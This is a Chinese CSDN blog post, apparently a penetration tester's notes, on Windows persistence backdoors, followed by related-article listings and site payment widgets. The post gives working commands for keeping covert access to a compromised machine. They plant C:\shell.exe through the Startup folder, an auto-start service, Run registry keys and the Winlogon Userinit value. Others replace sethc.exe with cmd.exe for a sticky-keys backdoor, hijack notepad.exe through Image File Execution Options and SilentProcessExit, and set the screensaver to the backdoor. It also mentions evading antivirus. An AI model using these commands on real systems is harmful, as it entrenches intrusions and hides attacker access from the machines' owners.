【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

已于 2024-07-03 10:08:34 修改
阅读量913 收藏 4
点赞数
分类专栏: # 权限维持 文章标签: windows microsoft 服务器 权限维持
于 2023-04-15 17:43:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130102898
版权

文章目录

权限维持-域环境&单机版-自启动

1、自启动路径加载

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

将后门放置该目录,服务器重启即上线
2、自启动服务加载

sc create ServiceTest binPath= C:\shell.exe  start= auto
sc delete ServiceTest

3、自启动注册表加载
-当前用户键值

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

-服务器键值(需要管理员权限)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

-添加启动项

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

在这里插入图片描述
4、计划计时任务
参考前面横向移动

权限维持-域环境&单机版-粘滞键

远程连接时,连按五下shift键可以打开粘滞键
在这里插入图片描述

系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。
粘滞键位置:

c:\windows\system32\sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe		本质还是进行程序替换

权限维持-域环境&单机版-映像劫持

测试:执行notepad成cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

在这里插入图片描述

配合GlobalFlag隐藏:执行正常关闭后触发

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\shell.exe"

33::18

权限维持-域环境&单机版-屏保&登录

1、WinLogon配合无文件落地上线(切换用户登录就会上线)

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "userinit,C:\shell.exe"

在这里插入图片描述
配合powershell payload(需免杀)实现无文件落地
在这里插入图片描述

2、屏幕保护生效后执行后门

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
An0nymouer
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hades.zip 哈迪斯屏幕劫持 幽灵
09-09
韩剧幽灵里面的哈迪斯屏幕劫持病毒,由于该病毒运行危险性较大,所以对病毒进行了改动,只能劫持鼠标、不劫持盘。该病毒用易语言编写而成
可自删除 开启3389创建用户粘滞后门的vbs
09-06
开启3389创建用户粘滞后门,作研究使用,请勿违法。
内网渗透之权限维持-自启动&映像劫持&粘滞&辅助屏保后门&WinLogon
m0_62207170的博客
05-19 911
内网渗透之权限维持-自启动&映像劫持&粘滞&辅助屏保后门&WinLogon
权限维持
最新发布
WX公众号-小白学安全
04-15 708
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术,包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用,欢迎留言分享。在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
Windows权限维持自启动&映像劫持&粘滞&辅助屏保后门&WinLogon
剁椒鱼头没剁椒的博客
08-17 1478
Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置,在无网络中设置一个正向木马,让其在运行,在有网络中设置一个反向的木马,让其运行,那么我们去连接的时候只要去连接反向木马就可以了,然后在通过这个反向木马去连接正向木马,不就可以了。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。
权限维持
weixin_43999372的博客
05-28 1563
windows 权限维持 一 修改注册表建立隐藏用户 一.环境 windows 2007 CMD命令行下,建立了一个用户名为“test”,密码为test的用户,并加入管理员组,cMD命令行使用"netuser",看不到"test”,密码为test的用户,并加入管理员组 ,cMD命令行使用"net user
Windows 权限维持手法
qq_53742230的博客
07-20 605
Windows 权限维持手法总结
粘滞后门-自动创建-批处理版(axun)
11-25
粘滞Windows系统为帮助有特殊需求的用户设计的功能,当用户连续按下Shift五次时,系统会开启粘滞模式,使得每次按下单一的Shift都能保持Shift的功能。这一功能在某些情况下对行动不便或有特殊输入需求的...
一个delphi和C写的粘滞后门
06-03
粘滞Windows 操作系统中的一个辅助功能,允许用户在按住Shift五次后暂时启用连续按下单个Shift的效果,方便有特殊需求的用户操作。然而,黑客有时会利用这一功能来实现恶意目的。 描述中提到“代码比较...
360屏蔽windows和系统粘滞.docx
09-26
"360屏蔽Windows和系统粘滞" 一、概述 在Windows操作系统中,Windows和系统粘滞是两个常用的热。然而,在某些情况下,这两个可能会干扰到游戏或其他应用程序的正常运行。为了解决这个问题,360安全卫士...
粘滞替换为cmd.exe
07-02
粘滞(Sticky Keys)是Windows操作系统中的一项辅助功能,设计用于帮助用户在按下Shift五次后连续输入多个Shift。这个功能对于那些有物理障碍或使用困难的用户非常有用,但有时可能被误触发或者不适用于某些...
Cute Kittens & Kitty Cats Wallpaper HD NewTab-crx插件
04-02
★活可爱的小猫&猫咪猫壁纸动画,屏保和猫主题的屏幕保护&幻灯片。 ★快速拨号,快速启动应用程序和最受欢迎的网站。 ★保持可爱的小猫&kitty猫壁纸新标签同步,结合所有freeaddons newtab - 获得更多:...
粘滞漏洞破解系统管理员权限的方法
09-04
利用粘滞漏洞来破解管理员权限,在机器上实验过
Spiderman & Iron Man Wallpaper Custom New Tab-crx插件
04-07
★活蜘蛛侠和钢铁侠壁纸动画,蜘蛛侠和铁男主题的屏幕保护程序和幻灯片。 ★快速拨号,快速启动应用程序和最受欢迎的网站。 ★保持蜘蛛侠和钢铁界面的新标签同步,结合所有FreeAddons Newtab - 获得更多蜘蛛侠和...
Beach & Ocean Sunset Wallpaper Custom New Tab-crx插件
04-07
★直播海滩和海洋日落壁纸动画,海滩和海洋日落主题的屏幕保护程序。 ★快速拨号,快速启动应用程序和最受欢迎的网站。 ★保持海滩和海洋日落壁纸在同步中,组合所有Freeaddons Newtab - 获取更多:...
BTS RM & Suga Wallpapers Custom NamGi New Tab-crx插件
04-07
粘滞便笺,任务提醒。 ★Live BTS RM&Suga壁纸动画。 BTS Namgi主题的幻灯片。 ★快速启动应用程序,大多数访问过的网站。 ★Sync BTS RM&Suga壁纸新标签所有Freeaddons NewTab - 更多BTS Namgi主题:...
Windows权限维持
niqiu320的博客
05-18 278
0x01 影子账号创建 创建普通账号 net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@ net localgroup administrators laosec /add #将普通账号laosec添加进administrators组 创建隐藏账号 net user laosec$ 123admiN@ /add #创建隐藏账号laosec密码为123admiN@(计算机管理
Windows权限维持技术总结、复现
leah126的博客
03-13 877
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
渗透测试笔记——暴力破解、定时任务与shift粘贴权限维持、wakuang程序(靶机系统:Windows2008)
W小哥
11-17 907
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 一、环境搭建 靶机: Windwos Server 2008 系统 靶机IP地址: 192.168.226.137 攻击IP地址: 192.168.226.1 二、模拟攻击 2.1 扫描端口 拿到目标IP首先使用nmap扫描,探测一下开放的端口 nmap -sS 192.168.226.137 发现目标系统的 3389 号端口开发 2.2 暴力破解 Administrator 密码 使用 hydra 工具爆破 Adminis
windows 粘滞
08-03
Windows粘滞是一种功能,它可以使得按在按下后保持按住的状态,而不需要一直按住盘。然而,有时候粘滞可能会导致一些不便,比如在按下Shift、Ctrl、Alt等时会发出滴滴声,影响打字。为了解决这个问题,可以采取以下方法关闭粘滞。 方法一:通过设置界面关闭粘滞。在Windows 10中,可以通过按下Win + U组合打开“轻松使用”设置界面,然后选择“盘”选项卡,在“粘滞”部分将其关闭。[1] 方法二:通过注册表关闭粘滞。这种方法需要小心操作,因为修改注册表可能会对系统造成影响。可以按照提供的链接中的步骤进行操作,具体步骤可以参考链接中的内容。[3] 需要注意的是,有些情况下关闭粘滞后可能会自动重新启动。如果遇到这个问题,可以尝试先关闭杀毒软件,然后再重复上述两种方法,这样可能可以解决问题。[2] 希望以上方法对您关闭Windows粘滞有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值